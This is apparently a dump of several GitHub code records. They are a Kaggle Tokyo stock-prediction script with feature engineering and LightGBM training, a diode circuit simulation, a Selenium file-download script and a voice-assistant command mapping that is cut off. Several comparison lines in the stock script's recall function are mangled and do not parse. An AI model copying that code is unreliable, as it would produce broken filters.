ym0-12+100\n return ym0\ndef process(train_fin,train_op,train_pr,train_sec_pr,train_trd ):\n for f in [train_fin,train_op,train_pr,train_sec_pr,train_trd ]:\n f['Date'] = f['Date'].apply(lambda x :int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n train_pr['C*V'] = train_pr['Volume']*train_pr['Close']\n #先粘上股票信息,带入了市场部门名称,但需要注意stock表里有生效日期,如何处理?\n train_pr = train_pr.merge(stock_list[['SecuritiesCode','IssuedShares','Section','33SectorCode','17SectorCode']],how='left',on='SecuritiesCode')\n #换手率直接加,成交量/发行股份\n train_pr['Turnover'] = train_pr['Volume']/train_pr['IssuedShares']\n \n train_trd['StartDate'] = train_trd['StartDate'].apply(lambda x :int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n train_trd['EndDate'] = train_trd['EndDate'].apply(lambda x :int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n train_fin['CurrentFiscalYearStartDate'] = train_fin['CurrentFiscalYearStartDate'].apply(lambda x :np.nan if pd.isna(x) else int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n for col in train_fin.columns:\n try:train_fin[col] = train_fin[col].apply(lambda x:np.nan if x=='-' else x).astype(np.float32) #将销售额等转换为浮点数\n except:pass\n \n #price到trade表的市场映射dict,只包含2000支股票对应三大市场\n section_dict = {'First Section (Domestic)':'Prime Market (First Section)', 'Second Section(Domestic)':'Standard Market (Second Section)', \n 'Mothers (Domestic)':'Growth Market (Mothers/JASDAQ)','JASDAQ(Standard / Domestic)':'Growth Market (Mothers/JASDAQ)',\n 'JASDAQ(Growth/Domestic)':'Growth Market (Mothers/JASDAQ)'}\n #再对市场部门名称 进行映射后与trade来merge\n train_pr['Section'] = train_pr['Section'].apply(lambda x:section_dict[x])\n\n fea_fin = ['NetSales','OperatingProfit','OrdinaryProfit','Profit','EarningsPerShare','TotalAssets','Equity','EquityToAssetRatio','BookValuePerShare','AverageNumberOfShares'] #若这些重要信息全为nan,则丢掉\n train_fin = train_fin.loc[train_fin[fea_fin].dropna(how='all').index].drop(columns=['DisclosureNumber','DisclosedDate','DateCode','DisclosedTime','DisclosedUnixTime','TypeOfDocument','CurrentPeriodEndDate','CurrentFiscalYearEndDate'])\n train_fin = train_fin.groupby(['SecuritiesCode','CurrentFiscalYearStartDate','TypeOfCurrentPeriod']).agg(\"max\").reset_index() #去重,mean可能使得文件公布日期变化\n\n #1Q就是0-2,2Q是3-5,3Q是6-8,4Q是9-11,5Q是12-14,FY则需要根据前一个判定+多少\n def process(a):\n for col in ['NetSales','OperatingProfit','OrdinaryProfit','Profit']:\n new = a[col].copy()\n a[col] = a[col]-a[col].shift(1)\n ind = a[a['TypeOfCurrentPeriod']==\"1Q\"].index\n a.loc[ind,col] = new[ind]\n a[\"CMA\"] = (a[\"TotalAssets\"]-a[\"TotalAssets\"].shift(1))/a[\"TotalAssets\"].shift(1)\n a[\"SGR\"] = (a[\"NetSales\"]-a[\"NetSales\"].shift(1))/a[\"NetSales\"].shift(1) #shift(1)是当季度-上季度/上季度\n a[\"PGR\"] = (a[\"Profit\"]-a[\"Profit\"].shift(1))/a[\"Profit\"].shift(1)\n return a\n train_fin = train_fin.groupby('SecuritiesCode').apply(lambda x:process(x) ).reset_index(drop=True)\n #只留下了销售额等重要信息\n \n #相关因子衍生\n train_fin['ROA'] = train_fin[\"Profit\"]/train_fin[\"TotalAssets\"] #资产回报率\n train_fin['RMW'] = train_fin[\"Profit\"]/train_fin[\"Equity\"]\n train_fin['GPM'] = train_fin[\"Profit\"]/train_fin[\"NetSales\"] #销售毛利率\n train_fin['BookValuePerShare'] = train_fin['Equity']/train_fin['AverageNumberOfShares']\n train_fin = train_fin.merge(stock_list[['SecuritiesCode','33SectorCode','33SectorName','17SectorCode','17SectorName']],how='left',on='SecuritiesCode')\n #按Date来groupby后用17SectorName来计算市场份额=\"NetSales\"/\"NetSales\"sum\n def add_sector(x):\n df = x.groupby(\"17SectorName\")[\"NetSales\"].agg(\"sum\")\n x[\"SOM\"] = x.apply(lambda x:x[\"NetSales\"]/df[x[\"17SectorName\"]], axis = 1) #市场份额\n return x\n train_fin = train_fin.groupby(['CurrentFiscalYearStartDate','TypeOfCurrentPeriod']).apply(lambda x:add_sector(x)).reset_index(drop=True)\n '''\n series = train_fin['BookValuePerShare']/(train_fin['Close']+1e-9 )\n series.rename(\"BM\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #账面市值比\n series = train_fin['Close']/(train_fin['EarningsPerShare']+1e-9 )\n series.rename(\"PE\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #PE\n series = train_fin['Close']/(train_fin['BookValuePerShare']+1e-9 )\n series.rename(\"PB\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #PB\n series = train_fin['Close']*train_fin['AverageNumberOfShares']/(train_fin['NetSales']+1e-9 )\n series.rename(\"PS\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #PS'''\n \n return train_pr,train_fin,train_trd\n\n#粘上新增的财报、市场信息\nvalid_pr,valid_fin,valid_trd = pd.concat((train_pr,valid_pr)).reset_index(drop=True),pd.concat((train_fin,valid_fin)).reset_index(drop=True),pd.concat((train_trd,valid_trd)).reset_index(drop=True)\ntrain_xy,train_fin,train_trd = process(train_fin,train_op,train_pr,train_sec_pr,train_trd )\nvalid_xy,valid_fin,valid_trd = process(valid_fin,valid_op,valid_pr,valid_sec_pr,valid_trd )\nvalid_xy = valid_xy[valid_xy[\"Date\"]>train_xy[\"Date\"].max()].reset_index(drop=True)\n#valid_xy = valid_xy[valid_xy[\"Date\"]<20220300].reset_index(drop=True)\nvalid_fin = valid_fin.sort_values(['CurrentFiscalYearStartDate','TypeOfCurrentPeriod']).drop_duplicates(['SecuritiesCode','CurrentFiscalYearStartDate','TypeOfCurrentPeriod'],keep=\"last\").reset_index(drop=True) #排序、去重\ndef recall(df,sect=True): #【总资产增长率CMA、销售增长率SGR、利润增长率PGR、资产回报率ROA、销售毛利率GPM、市场份额SOM、】\n # print(len(set(df['SecuritiesCode'].unique().tolist()) & Securities_Code_L))\n if sect==False: #没有交错\n #通过总资产选取\n Equity_P = df[df[\"Equity\"]>df[\"Equity\"].quantile([0.97])[0.97]][\"SecuritiesCode\"].unique().tolist()\n Equity_P = set(Equity_P) & Securities_Code_L\n Equity_N = df[df[\"Equity\"]df[\"TotalAssets\"].quantile([0.95])[0.95]][\"SecuritiesCode\"].unique().tolist()\n Assets_P = set(Assets_P) & Securities_Code_L\n Assets_N = df[df[\"TotalAssets\"]df[\"CMA\"].quantile([0.95])[0.95]][\"SecuritiesCode\"].unique().tolist()\n # CMA_P = set(CMA_P) & Securities_Code_L\n # CMA_N = df[df[\"CMA\"]df[\"SGR\"].quantile([0.85])[0.85]][\"SecuritiesCode\"].unique().tolist()\n # SGR_P = set(SGR_P) & Securities_Code_L\n # SGR_N = df[df[\"SGR\"]df[\"PGR\"].quantile([0.85])[0.85]][\"SecuritiesCode\"].unique().tolist()\n # PGR_P = set(PGR_P) & Securities_Code_L\n # PGR_N = df[df[\"PGR\"]df[\"ROA\"].quantile([0.9])[0.9]][\"SecuritiesCode\"].unique().tolist()\n ROA_P = set(ROA_P) & Securities_Code_L\n ROA_N = df[df[\"ROA\"]df[\"GPM\"].quantile([0.8])[0.8]][\"SecuritiesCode\"].unique().tolist()\n GPM_P = set(GPM_P) & Securities_Code_L\n GPM_N = df[df[\"GPM\"]df[\"SOM\"].quantile([0.85])[0.85]][\"SecuritiesCode\"].unique().tolist()\n SOM_P = set(SOM_P) & Securities_Code_L\n SOM_N = df[df[\"SOM\"] float:\n def _calc_spread_return_per_day(df, portfolio_size, toprank_weight_ratio):\n #weights=[2,1]之间的200个点,计算前200个的purchase,后200个的short\n weights = np.linspace(start=toprank_weight_ratio, stop=1, num=portfolio_size)\n purchase = (df.sort_values(by=\"Rank\")['Target'][:portfolio_size] * weights).sum() / weights.mean()\n short = (df.sort_values(by=\"Rank\", ascending=False)['Target'][:portfolio_size] * weights).sum() / weights.mean()\n return purchase - short\n\n buf = df.groupby('Date').apply(_calc_spread_return_per_day, portfolio_size, toprank_weight_ratio)\n if df['Date'].nunique()==1:sharpe_ratio = buf.values[0]\n else:sharpe_ratio = buf.mean() / (1e-9+buf.std())\n return sharpe_ratio\ndef custom_loss(y_true,y_pred): #提前按Date来groupby并排序好,存下类似g_train之类的数据,然后按g_train数目进行loss计算\n #把pred按g_train分好组\n mmax = g_train.max()\n exp_y = np.exp(y_pred)\n #先做 exp_y 对应的mask表求分母下的sum,上三角\n mask0 = []\n for i in range(len(g_train)):\n g_ = g_train[:i].sum()\n tmp = exp_y[g_:g_+g_train[i]]\n mask0 += np.triu(np.meshgrid(tmp,tmp)[0] ).sum(axis=1).tolist() #保留上三角\n mask0 = np.array(mask0)\n grad,hess = [],[]\n for i in range(len(g_train)):\n g_ = g_train[:i].sum()\n tmp = mask0[g_:g_+g_train[i]]\n tmp = np.meshgrid(tmp,tmp)[0]\n tmp = np.divide(exp_y[g_:g_+g_train[i]].reshape(-1,1),tmp )\n tmp = np.tril(tmp) #保留下三角\n grad += tmp.sum(axis=1).tolist()\n tmp = tmp-tmp**2\n hess += tmp.sum(axis=1).tolist()\n grad = np.array(grad)-1\n hess = np.array(hess)\n return grad,hess\ndef add_rank(x,ranks):\n x = x.sort_values(by=\"Prediction\", ascending=False)\n x['Rank'] = range(ranks,ranks+x.shape[0])\n return x\ndef custom_lgb_eval(y_true, y_pred): #仅用一天的来早停\n T,Y = pd.DataFrame(data=y_true,columns=[\"Target\"]),pd.DataFrame(data=y_pred,columns=[\"Prediction\"])\n TY = pd.concat((T,Y),axis=1)\n TY[\"Date\"] = 0\n for i in range(len(g_eval)-1):TY.loc[ g_eval[:i+1].sum():g_eval[:i+2].sum() ,\"Date\"]=i+1\n TY = TY[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,0) ).reset_index(drop=True)\n score = calc_spread_return_sharpe(TY, 200, 2)\n return 'sharp_ratio',score, True\ndef evaluation_valid(valid_xy,model):\n df_P_L1 = valid_xy[valid_xy[\"SecuritiesCode\"].apply(lambda x:x in P_L)].reset_index(drop=True)\n df_P_L1[\"Prediction\"] = model.predict( df_P_L1.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]).values,num_iteration=model.best_iteration_ ) #lgb换xgb需要改此处以及,ntree_limit = model.best_ntree_limit\n df_P_L1 = df_P_L1[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,0) ).reset_index(drop=True)\n df_N_L1 = valid_xy[valid_xy[\"SecuritiesCode\"].apply(lambda x:x in N_L)].reset_index(drop=True)\n df_N_L1[\"Prediction\"] = model.predict( df_N_L1.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]).values,num_iteration=model.best_iteration_ ) #,num_iteration=model.best_iteration_\n df_N_L1 = df_N_L1[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,len(P_L)+1) ).reset_index(drop=True)\n valid_ = pd.concat((df_P_L1,df_N_L1)).reset_index(drop=True)\n score = calc_spread_return_sharpe(valid_, 200, 2)\n return score\ndef custom_xgb_eval(pred,dtrain):\n T,Y = dtrain.get_label(),pred\n T,Y = pd.DataFrame(data=T,columns=[\"Target\"]),pd.DataFrame(data=Y,columns=[\"Prediction\"])\n TY = pd.concat((T,Y),axis=1)\n TY[\"Date\"] = 0\n for i in range(len(g_eval)-1):TY.loc[ g_eval[:i+1].sum():g_eval[:i+2].sum() ,\"Date\"]=i+1\n TY = TY[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,0) ).reset_index(drop=True)\n score = calc_spread_return_sharpe(TY, 200, 2)\n return 'sharp_ratio',score\n\ntrain_x,train_y = train_xy.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]),train_xy[\"Target\"]\n'''\nparams = {\n 'booster': 'gbtree', 'objective': 'reg:squarederror', #reg:squarederror rank:ndcg\n #'eval_metric': ['logloss','auc'],\n 'gamma': 1, 'min_child_weight': 3, 'max_depth': 8, 'learning_rate': 0.01, 'lambda': 1, 'alpha': 1,\n 'subsample': 0.7, 'colsample_bytree': 0.7, 'colsample_bylevel': 0.7, 'eta': 0.05, #0.05-0.3\n 'tree_method': 'exact', 'seed': random_seed, 'nthread': 48, \"silent\": True\n }\nwatchlist = [( xgb.DMatrix(valid_xy.drop(columns=[\"Date\",\"SecuritiesCode\",\"Target\"]).values, label=valid_xy[\"Target\"].values), 'eval')]\nmodel = xgb.train( params, xgb.DMatrix(train_x.values, label=train_y.values), evals=watchlist,feval=custom_xgb_eval,maximize=True , num_boost_round=1000, early_stopping_rounds=500, verbose_eval=20)\nprint(\"\\n\".join((\"%s: %.2f\" % x) for x in list(sorted( model.get_fscore().items(),key=lambda x:x[1],reverse=False)) ))\nprint(\"最优迭代步:\",model.best_iteration,model.best_ntree_limit, model.best_score)\nmodel.save_model(f\"xgb_model{random_seed}.model\") #model = xgb.Booster(model_file=\"xgb_model{random_seed}.model\")但此时得xgb.DMatrix()\nfig,ax = plt.subplots(figsize=(15,15))\nplot_importance(model, height=0.5, ax=ax, max_num_features=32)\nplt.show()\nscore = evaluation_valid(valid_xy,model)\nprint(\"valid_score:\",score)\n'''\n\n\n#先对userid排序后,即可传入从开头到后面每隔多少个数据进行rank的损失限定\n#此处则按Date进行排序,然后每个传入2000支股票即可\n#model = LGBMRanker(boosting_type='gbdt',objective='lambdarank', num_leaves=512, n_estimators=5000, reg_alpha=0.1, reg_lambda=0.1, max_depth=8, subsample=0.7, colsample_bytree=0.7, subsample_freq=1,\n# learning_rate=0.01, min_child_weight=30, random_state=random_seed, n_jobs=-1)\n#model.fit(train_x,train_y, group=g_train, eval_set=[watchlist], eval_group=[g_eval], eval_metric = custom_lgb_eval, early_stopping_rounds=2000, verbose=20)\n\nwatchlist = (valid_xy.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]).values, valid_xy[\"Target\"].values) #[valid_xy['Date']==lastday-1]\n#custom_loss 'rmse'\nmodel = LGBMRegressor(num_leaves=128,num_iterations = 1000,learning_rate=0.01,objective = 'mse' ,metric='custom', verbose=-1, lambda_l1=1,lambda_l2=1,min_child_weight=30,random_state=random_seed,n_jobs=48 )\nmodel.fit(train_x,train_y, eval_set=watchlist ,eval_metric = custom_lgb_eval, early_stopping_rounds=1000,verbose=20)\nprint(\"最优迭代步:\",model.best_iteration_, model.best_score_)\nscore = evaluation_valid(valid_xy,model)\nprint(\"valid_score:\",score)\njoblib.dump(model,f\"lgb_model{random_seed}.pkl\") #model=LGBMRegressor() model=joblib.load(f\"lgb_model{random_seed}.pkl\")\n\nfea_ = model.feature_importances_\nfea_name = train_x.columns.tolist()\nfea_name,fea_ = zip(*sorted(zip(fea_name,fea_), key=lambda x:x[1],reverse = True)) #默认,reverse = False升序\nprint(\"特征重要程度排序:\\n\",list(zip(fea_name[:50],fea_[:50])) )\nimport matplotlib.pyplot as plt\nplt.figure(figsize=(10,10))\nplt.barh(fea_name,fea_,height =0.5)\nplt.show()\n\n\nprint(\"总耗时min:\",(time.time()-time_now)/60)\n","repo_name":"WaJun-Code/mygit","sub_path":"AI/kaggle_JPX_Tokyo_Stock_Exchange_Prediction/boost_main.py","file_name":"boost_main.py","file_ext":"py","file_size_in_byte":29233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73147853162","text":"# !/usr/bin/env python3\n# -*- coding_ctrl: utf-8 -*-\n\n# ------------------------------------- #\n# Created by: JOaO PEDRO PETERS BARBOSA #\n# & MATHEUS SENE PAULO #\n# #\n# email: joao.peters@engenharia.ufjf.br #\n# & matheus.sene@engenharia.ufjf.br #\n# #\n# Date: Jul/2021 #\n# ------------------------------------- #\n\n\n\"\"\"\nDisciplina [210081] - Tecnicas de Simulacao de Conversores Estaticos\n\nCircuito de Cockcroft-Walton\n\nAplicacao da modelagem PWL no diodo, e metodo de integracao trapezoidal.\n\nBaseado em material disponibilizado pelo professor.\n\nProf.: Pedro Gomes Barbosa\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\n\n# ------------------------------ #\n# Elementos Passivos do Circuito #\n# R = 12 # (Ohms)\nC = 500e-6 # (Farad)\n\n# -------------------- #\n# Fonte de Alimentacao #\nvS = 127 # (Vrms)\nf = 60 # (Hertz)\nw = 2 * np.pi * f # (rad/s)\nT = 1 / f # (seg)\n\n# ----------------------- #\n# Parametros de Simulacao #\nt0 = 0 # valor inicial\ntn = 0.2 # valor final\ndeltaT = 100e-6 # passo de simulacao\n\ntempo1 = np.arange(t0, tn+deltaT, deltaT) # tempo de simulacao\nnptos = tempo1.shape[0] # total de pontos simulado\n\nt_ant = 0 # tempo anterior (t - deltaT)\ntol = 1e-3 # tolerancia de convergencia\n\n# ----------------------------------------------- #\n# Matriz Nodal Modificada (MNM) e Vetores Solucao #\n# MNM = np.zeros((3, 3))\nMNM_var = np.zeros((4, 4))\nMNM_cte = np.zeros((4, 4))\n\nvi = np.zeros((4, 1)) # vetor solucao: v1, v2, v3 & iS\nJE_k = np.zeros((4, 1)) # Contribuicoes fonte de corrente\n\nvi_ant = vi # vetor solucao anterior\nvk_ant = vi\n\n# ---------------------- #\n# Modelagem PWL do diodo #\nRd0 = 1e6\nRd1 = 10e-3\n\nGd0 = 1 / Rd0\nGd1 = 1 / Rd1\nGc = (2 * C) / deltaT\n\nvD = 0.7\ni0 = 0\n\nb = (Gd1 + Gd0) / 2\ncj = (Gd1 - Gd0) / 2\na = i0 - (cj * np.abs(vD))\n\n# ------------------------------- #\n# Variaveis de saida da simulacao #\nout_v1 = [0]\nout_v2 = [0]\nout_v3 = [0]\nout_iS = [0]\nJc2_ant2 = 0 \nJc1_ant2 = 0 \nid1_vet = [0]\nid2_vet = [0]\nflag = 'TPZ'\npassos = 0 \ntempo= [0]\nt = 1\nGd1_vet=[0]\nGd2_vet=[0]\n\n # MNM constante \nMNM_cte[0][0] = + Gc # c1: 1->2\nMNM_cte[1][0] = - Gc # :\nMNM_cte[0][1] = - Gc # :\nMNM_cte[1][1] = + Gc # :\nMNM_cte[2][2] = + Gc # c2: 3->gr\nMNM_cte[3][0] = + 1 # vS: 1->gr\nMNM_cte[0][3] = + 1 # : \n# ----------------- #\n# Loop de simulacao #\nwhile t < nptos:\n cont_d = 0\n errok = np.ones((4, 1)) # armazena erros\n\n vc1_ant = + vi_ant[0][0] - vi_ant[1][0] # v1 - v2\n vc2_ant = + vi_ant[2][0] \n\n if flag == 'TPZ':\n\n t_k = (deltaT * t)\n tempo.append(t_k)\n # --------------- #\n # fonte de tensao #\n vs_k = np.sqrt(2) * vS * np.sin((w * t_k) + np.pi)\n \n ic1_ant = Gc * vc1_ant - Jc1_ant2\n Jc1_ant = + (Gc * vc1_ant) + ic1_ant # ic + ic_ant -> tpz\n Jc1_ant2 = Jc1_ant\n\n ic2_ant = Gc * vc2_ant - Jc2_ant2\n Jc2_ant = + (Gc * vc2_ant) + ic2_ant # ic + ic_ant -> tpz\n Jc2_ant2 = Jc2_ant\n\n if flag == 'BE':\n\n t_k = t_k + (deltaT/2)\n tempo.append(t_k)\n # --------------- #\n # fonte de tensao #\n vs_k = np.sqrt(2) * vS * np.sin((w * t_k) + np.pi)\n \n Jc1_ant = + (Gc * vc1_ant) \n Jc1_ant2 = Jc1_ant\n\n Jc2_ant = + (Gc * vc2_ant) \n Jc2_ant2 = Jc2_ant\n\n passos -= 1 \n \n # ------------------- #\n # Modelagem PWL diodo #\n\n while np.max(np.abs(errok)) > tol:\n print(t, cont_d)\n\n # ------------------------------------------------ #\n # Analise de tensao e fonte de corrente do diodo 1 #\n vd1_ant = - vk_ant[1][0] # -v2\n Gd1 = b + (cj * np.sign(vd1_ant - vD))\n \n id1 = a + (b * vd1_ant) + (cj * np.abs(vd1_ant - vD)) \n Jd1 = id1 - (vd1_ant * Gd1)\n # ------------------------------------------------ #\n # Analise de tensao e fonte de corrente do diodo 2 #\n vd2_ant = vk_ant[1][0] - vk_ant[2][0] # v2 - v3\n Gd2 = b + (cj * np.sign(vd2_ant - vD))\n \n id2 = a + (b * vd2_ant) + (cj * np.abs(vd2_ant - vD))\n #id2_vet.append(id2)\n Jd2 = id2 - (vd2_ant * Gd2) \n\n # -------------------------------- #\n # Matriz Nodal Modificada variavel #\n MNM_var[1][1] = + Gd1 + Gd2 # d1: 2->gr || d2:2->3\n MNM_var[1][2] = - Gd2 # :\n MNM_var[2][1] = - Gd2 # :\n MNM_var[2][2] = + Gd2 # :\n\n invMNM = np.linalg.inv(MNM_cte + MNM_var) # MNM invertida\n\n # ----------------------------- #\n # Vetor de Fontes Independentes #\n JE_k[0][0] = + Jc1_ant\n JE_k[1][0] = + Jd1 - Jd2 - Jc1_ant\n JE_k[2][0] = + Jd2 + Jc2_ant\n JE_k[3][0] = + vs_k\n\n # -------------------------- #\n # Calculo das tensoes nodais #\n vi = np.dot(invMNM, JE_k)\n \n cont_d = cont_d + 1\n errok = (vi - vk_ant) #vk_ant roda no loop iterativo\n vk_ant = vi \n\n Gd1_vet.append(Gd1)\n Gd2_vet.append(Gd2)\n #id1_vet.append(id1) \n #id2_vet.append(id2)\n \n d = (vi[3][0] - vi_ant[3][0])/deltaT\n\n #if ( (Gd1_vet[t] != Gd1_vet[t-1] or Gd2_vet[t] != Gd2_vet[t-1]) and flag == 'TPZ'): \n if ( np.abs(d) > 20e3 and flag == 'TPZ'):\n flag = 'BE'\n passos = 2\n nptos += 2\n tempo.pop(t)\n Gd1_vet.pop(t)\n Gd2_vet.pop(t)\n t = t - 1 \n vk_ant = vi_ant \n t_k = t_k - deltaT\n \n else: \n vi_ant = vi\n out_v1.append(vi[0][0])\n out_v2.append(vi[1][0])\n out_v3.append(vi[2][0])\n out_iS.append(vi[3][0])\n t += 1\n\n if passos == 0 and flag == 'BE': \n flag='TPZ'\n #t = t - 1 \n\n\nplt.figure()\nplt.plot(tempo, out_v1, label=\"Tensao Fonte\", color=\"red\")\nplt.plot(tempo, out_v2, label=\"Tensao N2\", color=\"lightgreen\")\nplt.plot(tempo, out_v3, label=\"Tensao N3\", color=\"darkgreen\")\nplt.plot(tempo, out_iS, label=\"Corrente Fonte\", color=\"grey\")\n\nplt.xlabel(\"Tempo de Simulacao (seg)\", fontsize=12)\nplt.ylabel(\"Amplitude [V] & [A]\", fontsize=12)\nplt.legend(frameon=True, facecolor=\"white\", edgecolor=\"white\")\nplt.grid()\n\n\n# FIGURA 2 #\nplt.figure()\nplt.plot(tempo, out_iS, label=\"Corrente Fonte\", color=\"grey\")\nplt.xlabel(\"Tempo de Simulacao (seg)\", fontsize=12)\nplt.ylabel(\"Amplitude [A]\", fontsize=12)\nplt.legend(frameon=True, facecolor=\"white\", edgecolor=\"white\")\nplt.grid()\n\n\nplt.show()\n\n\n\n","repo_name":"joaoppeters/linear_circuits_modeling","sub_path":"cockcroft_walton/cockcroft_walton/CockcroftWalton_pt1CDA.py","file_name":"CockcroftWalton_pt1CDA.py","file_ext":"py","file_size_in_byte":6540,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23914552373","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\nfp=webdriver.FirefoxProfile()\r\nfp.set_preference(\"browser.helperApps.neverAsk.saveToDisk\", \"text/plain,application/pdf\") #mime type\r\nfp.set_preference(\"browser.download.manager.showWhenStarting\", False)\r\nfp.set_preference(\"browser.download.dir\", \"C:\\BIGFIX\")\r\nfp.set_preference(\"browser.download.folderList\", 2);\r\nfp.set_preference(\"pdfjs.disabled\", True)\r\n\r\n\r\ndriver=webdriver.Firefox(executable_path=\"C:\\Projects\\Automation\\Drivers\\geckodriver.exe\",\r\n firefox_profile=fp)\r\n\r\ndriver.get(\"http://demo.automationtesting.in/FileDownload.html\")\r\n\r\n#download the text file\r\ntextArea1=driver.find_element_by_id(\"textbox\").send_keys(\"this is my fine text file testing!!!\")\r\ndriver.find_element_by_id(\"createTxt\").click() #click on the 1st button to GENERATE the link\r\ndriver.find_element_by_id(\"link-to-download\").click()#downlat the file after clicking on the LINK\r\n\r\n#quit\r\ndriver.quit()","repo_name":"IdanErgaz/Pytest","sub_path":"downloadFileInFF.py","file_name":"downloadFileInFF.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1267536426","text":"# this file has all the commands and mapping that the voice recognizer is able to pick up and do some action\n\nfrom _constants import MSFT_ACCOUNT_NAME_LIST\n\n# this list contains all the details about a command\nCOMMAND_DETAILS: dict = {\n 1: {\n \"method_name\": \"trigger_pipeline_run\",\n \"description\": \"Triggering Azure DevOps pipeline\",\n \"success_message\": \"Successfully triggered pipeline build\",\n \"failure_message\": \"Failed to trigger build pipeline\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n \"speak_args\": True,\n },\n 2: {\n \"method_name\": \"create_requirement_file\",\n \"description\": \"create the requirements.txt file\",\n \"args\": [\"pip freeze > requirements.txt\"],\n \"kargs\": {},\n \"success_message\": \"Successfully created requirements file\",\n \"failure_message\": \"Failed to create requirements file\",\n \"add_args\": False,\n \"speak_args\": True,\n },\n 3: {\n \"method_name\": \"get_total_pipeline_runs\",\n \"description\": \"get all pipeline runs count\",\n \"success_message\": \"There are a total of {} pipeline runs\",\n \"failure_message\": \"Failed to get the pipeline runs\",\n \"add_args\": False,\n \"speak_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 4: {\n \"method_name\": \"call_on_teams\",\n \"description\": \"call someone on teams\",\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 5: {\n \"method_name\": \"open_mail\",\n \"description\": \"mail someone on Outlook\",\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 6: {\n \"method_name\": \"open_teams_chat\",\n \"description\": \"Open up someones teams chat\",\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 7: {\n \"method_name\": \"show_help\",\n \"description\": \"Speak out 5 commands you can use\",\n \"add_args\": False,\n \"args\": [\"\"],\n \"kargs\": {},\n },\n 8: {\n \"method_name\": \"show_help\",\n \"description\": \"Speak out all the commands you can use\",\n \"add_args\": False,\n \"args\": [\"all\"],\n \"kargs\": {},\n },\n 9: {\n \"method_name\": \"push_code\",\n \"description\": \"Push the code to remote\",\n \"success_message\": \"Successfully pushed the code to remote\",\n \"failure_message\": \"Failed to push the code to remote\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 10: {\n \"method_name\": \"temp_commit_lock_screen\",\n \"description\": \"Commit code and lock the screen\",\n \"success_message\": \"Successfully commted the code\",\n \"failure_message\": \"Failed to commit the code\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 11: {\n \"method_name\": \"lock_screen\",\n \"description\": \"Lock the screen\",\n \"success_message\": \"Locked the screen\",\n \"failure_message\": \"Failed to lock the screen\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 12: {\n \"method_name\": \"crack_joke\",\n \"description\": \"crack a random programmer joke\",\n \"success_message\": \"{}\",\n \"speak_args\": True,\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 13: {\n \"method_name\": \"tell_a_story\",\n \"description\": \"Narrate a random programmer story\",\n \"success_message\": \"{}\",\n \"failure_message\": \"{}\",\n \"speak_args\": True,\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 14: {\n \"method_name\": \"get_chatbot_response\",\n \"description\": \"Chat with sandy\",\n \"success_message\": \"{}\",\n \"failure_message\": \"{}\",\n \"speak_args\": True,\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 15: {\n \"method_name\": \"generate_code\",\n \"description\": \"Generate Python code\",\n \"success_message\": \"{}\",\n \"failure_message\": \"{}\",\n \"speak_args\": False,\n \"add_args\": True,\n \"send_code\": True,\n \"args\": [],\n \"kargs\": {},\n },\n}\n\n# these are the commands or keyboards that the recognizer picks up and matches them with the command details\nCOMMAND_MAPPINGS: dict = {\n 1: [\"start build\", \"trigger pipeline build\"],\n 2: [\"create requirements.txt\", \"create requirements file\"],\n 3: [\"get total pipeline runs\"],\n 4: [], # dynamic addition calling someone\n 5: [], # dynamic addition open email\n 6: [], # dynamic addition open teams chat\n 7: [\"show help\", \"help\", \"what are the commands I can use\"],\n 8: [\"help more\", \"list all the commands I can use\"],\n 9: [\"git push\", \"push code\"],\n 10: [\"taking a break\", \"break time\"],\n 11: [\"lock screen\"],\n 12: [\"crack a joke\", \"joke about programmers\", \"make me feel better\"],\n 13: [\"tell a story\", \"story time\"],\n 14: [\"hey sandy\", \"sandy\"],\n 15: [\"hey codex\", \"codex\", \"hey codecs\", \"codecs\", \"cortex\"],\n}\n\n\ndef add_msft_account_to_commands():\n \"\"\"adding users to the command mapping list\"\"\"\n\n for account in MSFT_ACCOUNT_NAME_LIST:\n name = account.get(\"name\")\n\n COMMAND_MAPPINGS.get(4).append(f\"call {name.lower()}\")\n COMMAND_MAPPINGS.get(5).append(f\"mail {name.lower()}\")\n COMMAND_MAPPINGS.get(6).append(f\"open {name.lower()}'s 